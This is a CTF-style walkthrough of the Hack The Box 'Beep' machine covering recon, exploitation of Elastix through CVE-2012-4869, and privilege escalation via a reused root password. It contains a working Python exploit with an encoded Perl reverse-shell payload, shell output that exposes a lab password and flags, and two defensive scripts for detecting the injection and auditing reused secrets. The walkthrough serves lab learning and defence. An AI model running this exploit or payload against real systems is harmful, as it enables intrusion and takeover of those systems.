Beep

Beep Linux · Easy - Adventure mode

🔭 Reconnaissance:

```
┌──(pmartinezr㉿kali)-[~/htb/beep]
└─$ nmap -p- -sCVS -T 5 --min-rate 5000 10.129.229.183
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-02 13:45 CET
Warning: 10.129.229.183 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.129.229.183
Host is up (0.049s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp?
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://10.129.229.183/
|_http-server-header: Apache/2.2.3 (CentOS)
110/tcp   open  pop3?
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            853/udp   status
|_  100024  1            856/tcp   status
143/tcp   open  imap?
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_http-title: Elastix - Login page
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2026-01-02T12:51:04+00:00; +4s from scanner time.
|_http-server-header: Apache/2.2.3 (CentOS)
| http-robots.txt: 1 disallowed entry
|_/
856/tcp   open  status     1 (RPC #100024)
993/tcp   open  imaps?
995/tcp   open  pop3s?
3306/tcp  open  mysql?
4190/tcp  open  sieve?
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax?
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Host: 127.0.0.1
Host script results:
|_clock-skew: 3s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 611.53 seconds
```

Nmap shows a number of open ports. Several HTTP services stand out (80, 443 and 10000), so I think I would start there.

🔭 Reconnaissance:

```
┌──(pmartinezr㉿kali)-[~/htb/beep]
└─$ dirsearch -u http://10.129.229.183/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _  _  _  _ _|_    v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/pmartinezr/htb/beep/reports/http_10.129.229.183/__26-01-02_14-16-09.txt
Target: http://10.129.229.183/
[14:16:09] Starting:
[14:16:10] 302 -  296B  - /%2e%2e//google.com  ->  https://10.129.229.183/google.com
[14:16:11] 302 -  288B  - /%3f/  ->  https://10.129.229.183/?/
[14:16:13] 403 -  292B  - /.ht_wsr.txt
[14:16:13] 403 -  295B  - /.htaccess.bak1
[14:16:14] 403 -  295B  - /.htaccess.orig
[14:16:14] 403 -  297B  - /.htaccess.sample
[14:16:14] 403 -  295B  - /.htaccess.save
[14:16:14] 403 -  295B  - /.htaccess_orig
[14:16:14] 403 -  296B  - /.htaccess_extra
[14:16:14] 403 -  293B  - /.htaccess_sc
[14:16:14] 403 -  293B  - /.htaccessBAK
[14:16:14] 403 -  293B  - /.htaccessOLD
[14:16:14] 403 -  294B  - /.htaccessOLD2
[14:16:14] 403 -  285B  - /.htm
[14:16:14] 403 -  286B  - /.html
[14:16:14] 403 -  292B  - /.httr-oauth
[14:16:14] 403 -  291B  - /.htpasswds
[14:16:14] 403 -  295B  - /.htpasswd_test
[14:16:29] 403 -  317B  - /admin/views/ajax/autocomplete/user/a
[14:16:47] 403 -  289B  - /cgi-bin/
[14:16:47] 404 -  295B  - /cgi-bin/htmlscript
[14:16:47] 404 -  303B  - /cgi-bin/a1stats/a1disp.cgi
[14:16:47] 404 -  293B  - /cgi-bin/awstats/
[14:16:47] 404 -  295B  - /cgi-bin/awstats.pl
[14:16:47] 404 -  296B  - /cgi-bin/htimage.exe?2,2
[14:16:47] 404 -  297B  - /cgi-bin/imagemap.exe?2,2
[14:16:47] 404 -  290B  - /cgi-bin/login
[14:16:47] 404 -  294B  - /cgi-bin/login.cgi
[14:16:47] 404 -  298B  - /cgi-bin/mt-xmlrpc.cgi
[14:16:47] 404 -  295B  - /cgi-bin/index.html
[14:16:47] 404 -  291B  - /cgi-bin/mt.cgi
[14:16:47] 404 -  296B  - /cgi-bin/printenv.pl
[14:16:47] 404 -  295B  - /cgi-bin/mt7/mt.cgi
[14:16:47] 404 -  294B  - /cgi-bin/login.php
[14:16:47] 404 -  302B  - /cgi-bin/mt7/mt-xmlrpc.cgi
[14:16:47] 404 -  293B  - /cgi-bin/printenv
[14:16:47] 404 -  294B  - /cgi-bin/mt/mt.cgi
[14:16:47] 404 -  293B  - /cgi-bin/test.cgi
[14:16:47] 404 -  292B  - /cgi-bin/php.ini
[14:16:47] 404 -  301B  - /cgi-bin/mt/mt-xmlrpc.cgi
[14:16:47] 404 -  293B  - /cgi-bin/test-cgi
[14:16:47] 404 -  296B  - /cgi-bin/ViewLog.asp
[14:16:57] 403 -  287B  - /error/
[14:16:57] 404 -  292B  - /error/error.log
[14:17:13] 200 -  548B  - /mailman/listinfo
[14:17:13] 403 -  289B  - /mailman/
Task Completed
```

Using dirsearch I find a few subdirectories.

```html
<head>
<title>Mailman CGI error!!!</title>
</head><body>
<h1>Mailman CGI error!!!</h1>
The Mailman CGI wrapper encountered a fatal error. This entry is being stored in your syslog:
<pre>
Group mismatch error. Mailman expected the CGI wrapper script to be
executed as one of the following groups:
[apache],
but the system's web server executed the CGI script as group: "asterisk".
Try tweaking the web server to run the script as one of these groups:
[apache],
or re-run configure providing the command line option:
'--with-cgi-gid=asterisk'.</pre>
```

I visit the URL found earlier, http://10.129.229.183/mailman/listinfo. Little information: two groups, asterisk and apache, and no usernames show up here.

🔭 Reconnaissance:

```
┌──(pmartinezr㉿kali)-[~/htb/beep]
└─$ curl https://10.129.229.183:10000/ -k
<!doctype html public "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<link rel='stylesheet' type='text/css' href='/unauthenticated/style.css' />
<script type='text/javascript' src='/unauthenticated/toggleview.js'></script>
<script>
var rowsel = new Array();
</script>
<script type='text/javascript' src='/unauthenticated/sorttable.js'></script>
<meta http-equiv="Content-Type" content="text/html; Charset=iso-8859-1">
<title></title>
<title>Login to Webmin</title></head>
<body bgcolor=#ffffff link=#0000ee vlink=#0000ee text=#000000    onLoad='document.forms[0].pass.value = ""; document.forms[0].user.focus()'>
<table class='header' width=100%><tr>
<td id='headln2l' width=15% valign=top align=left></td>
<td id='headln2c' align=center width=70%><font size=+2></font></td>
<td id='headln2r' width=15% valign=top align=right></td></tr></table>
<p><center>
<form class='ui_form' action='/session_login.cgi' method=post >
<input class='ui_hidden' type=hidden name="page" value="/">
<table class='shrinkwrapper' width=40% class='loginform'>
<tr><td>
<table class='ui_table' width=40% class='loginform'>
<thead><tr class='ui_table_head'><td><b>Login to Webmin</b></td></tr></thead>
<tbody> <tr class='ui_table_body'> <td colspan=1><table width=100%>
<tr class='ui_table_row'>
<td valign=top colspan=2 align=center class='ui_value'>You must enter a username and password to login to the Webmin server on <tt>10.129.229.183</tt>.</td>
</tr>
<tr class='ui_table_row'>
<td valign=top  class='ui_label'><b>Username</b></td>
<td valign=top colspan=1  class='ui_value'><input class='ui_textbox' name="user" value="" size=20  ></td>
</tr>
<tr class='ui_table_row'>
<td valign=top  class='ui_label'><b>Password</b></td>
<td valign=top colspan=1  class='ui_value'><input class='ui_password' type=password name="pass" value="" size=20  ></td>
</tr>
<tr class='ui_table_row'>
<td valign=top  class='ui_label'><b> </b></td>
<td valign=top colspan=1  class='ui_value'><input class='ui_checkbox' type=checkbox name="save" value="1"  id="save_1" > <label for="save_1">Remember login permanently?</label>
</td>
</tr>
</tbody></table></td></tr></table>
</td></tr>
</table>
<input class='ui_submit' type=submit value="Login">
<input type=reset value="Clear">
</form>
</center>
<script>
if (window != window.top) {
window.top.location = window.location;
}
</script>
</div><p>
<br>
</body></html>
curl: (56) OpenSSL SSL_read: OpenSSL/3.5.4: error:0A000126:SSL routines::unexpected eof while reading, errno 0
```

You can use curl if you don't want to reconfigure your browser to a lower, and therefore less secure, minimum TLS version.

(screenshot: Webmin login page)

A Webmin portal is what we find on port 10000.

(screenshot: Elastix login page)

And this is the login we find on port 443: an Elastix sign-in page. To open this machine's web pages you have to lower the minimum TLS version in Firefox: open about:config, accept the "risk", and set security.tls.version.min to 1. Once you finish the machine you can revert the change.

⚠️ Vulnerability - Remote Code Execution (RCE)

CVE: CVE-2012-4869

💣 Preparation:

```python
#exploit modified by infosecjunky
#https://infosecjunky.com
#exploit re-modified by pmartinezr
import urllib.request
import ssl

rhost = "10.129.229.183"   # target (Elastix on port 443)
lhost = "10.10.14.110"     # address the reverse shell connects back to
lport = 4444               # port of the listener (multi/handler below)
extension = "233"          # extension sent in the callmenum parameter

# The target only negotiates legacy TLS and presents a self-signed, expired
# certificate, so force a TLSv1 context and disable certificate checks.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

# Reverse shell payload (CVE-2012-4869: CRLF injection through callmenum)
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.request.urlopen(url, context=ctx)
```

Searching online or in Metasploit you will see several exploits for Webmin, and some of them may well work. While enumerating the machine I realised there should be an exploit that works against Elastix (there is even a CVE for it), and I found this one written in Python, although I had to modify the code a little.

```
┌──(pmartinezr㉿kali)-[~/htb/beep]
└─$ python exploit.py
```

In one terminal we launch the exploit.

```
=========================================
Getting reverse shell
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.110:4444
[*] Command shell session 1 opened (10.10.14.110:4444 -> 10.129.229.183:56094) at 2026-01-02 21:09:23 +0100
whoami
asterisk
```

And I used exploit/multi/handler in Metasploit as the listener, which is how I got a reverse shell as the asterisk user.
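As an added defender-side example (not part of the original post), the following Python snippet scans constructed Apache access log lines for the trace this technique leaves on the Elastix host: a callme_page.php request whose callmenum parameter carries URL-encoded CR/LF followed by Asterisk manager headers such as Application: or Data:. The log lines, the log format regex and the function names are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Constructed Apache access log lines (not from the original post): one
# injected request, one ordinary call-me request, one unrelated page hit.
SAMPLE_LOG = """\
10.10.14.110 - - [02/Jan/2026:21:09:20 +0100] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20id%0D%0A%0D%0A HTTP/1.1" 200 512
10.10.14.110 - - [02/Jan/2026:21:08:11 +0100] "GET /recordings/misc/callme_page.php?action=c&callmenum=233 HTTP/1.1" 200 510
10.10.14.5 - - [02/Jan/2026:21:07:00 +0100] "GET /index.php HTTP/1.1" 200 2048
"""

# Common Log Format prefix: client, identity, user, [timestamp], "request", status
REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def is_ami_injection(raw_path: str) -> bool:
    """True if a callme_page.php request smuggles CRLF-separated AMI headers."""
    path, _, qs = raw_path.partition("?")
    if not path.endswith("callme_page.php"):
        return False
    decoded = unquote(qs)
    # A legitimate callmenum is a plain extension. A CR/LF followed by a
    # manager header (Application:, Data:, Action:) means the parameter is
    # being used to append extra manager actions (CVE-2012-4869).
    return bool(re.search(r'[\r\n]\s*(Application|Data|Action)\s*:', decoded, re.I))

def find_suspicious(log_text: str) -> list[dict]:
    """Return the client, timestamp and path of every injected request."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if m and is_ami_injection(m["path"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"]})
    return hits

if __name__ == "__main__":
    for h in find_suspicious(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} -> {h["path"][:90]}')
```

Patching Elastix/FreePBX so callmenum is validated as an extension is the fix; the scan above is only useful for spotting attempts in historical logs.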

👽 Actions:

```
bash-3.2$ cat /etc/elastix.conf
cat /etc/elastix.conf
mysqlrootpwd=jEhdIekWmdjE
cyrususerpwd=jEhdIekWmdjE
amiadminpwd=jEhdIekWmdjE
bash-3.2$ su -
su -
Password: jEhdIekWmdjE
[root@beep fanis]# cat user.txt
cat user.txt
006bd75c61a6abe9e7066c68b8728586
[root@beep fanis]# cat /root/root.txt
cat /root/root.txt
9521382a0f28c725b34e2cfcb03ee100
```

In this case I decided to poke around for a while looking for any file that might be useful, and I found /etc/elastix.conf. After that, privilege escalation was very easy because the password jEhdIekWmdjE is reused, including for the root account.
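An added example, not from the original post: a small Python audit that parses a key=value config such as /etc/elastix.conf, reports any secret shared by several *pwd keys, and flags a file mode that lets group or others read it, which is what allowed the asterisk service account to read the root-equivalent password here. The sample config is a constructed copy of the values shown above; the function names and the 0o644 mode are assumptions of this example.

```python
import stat
from collections import defaultdict

# Constructed copy of the /etc/elastix.conf lines shown in the post.
SAMPLE_CONF = """\
mysqlrootpwd=jEhdIekWmdjE
cyrususerpwd=jEhdIekWmdjE
amiadminpwd=jEhdIekWmdjE
"""

def parse_kv(text: str) -> dict[str, str]:
    """Parse key=value lines, skipping blanks and '#' comments."""
    out = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        k, v = line.split("=", 1)
        out[k.strip()] = v.strip()
    return out

def reused_secrets(conf: dict[str, str]) -> dict[str, list[str]]:
    """Map each secret that appears under more than one *pwd/*pass key to those keys."""
    by_value = defaultdict(list)
    for k, v in conf.items():
        if v and k.lower().endswith(("pwd", "pass", "password")):
            by_value[v].append(k)
    return {v: ks for v, ks in by_value.items() if len(ks) > 1}

def readable_by_others(mode: int) -> bool:
    """True if the st_mode grants read to group or world (e.g. 0o644)."""
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))

def audit(text: str, mode: int) -> list[str]:
    """Return human-readable findings for a config file's contents and mode."""
    findings = []
    for secret, keys in reused_secrets(parse_kv(text)).items():
        findings.append("one secret reused for: " + ", ".join(keys))
    if readable_by_others(mode):
        findings.append("file mode %o lets group/others read the secrets" % (mode & 0o777))
    return findings

if __name__ == "__main__":
    # 0o644 is assumed here: a file any local account can read, as the
    # asterisk user could in the post. Use os.stat(path).st_mode on a real host.
    for finding in audit(SAMPLE_CONF, 0o644):
        print("[!]", finding)
```

The two findings map to the two fixes: distinct secrets per service (and a root password that is not derived from any of them) and a 0600 root-owned config file.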

(screenshot: machine completed achievement)

To write this post I relied on a tool of my own making. Want to contribute? 🪲DarkReport

This post is licensed under CC BY 4.0 by the author.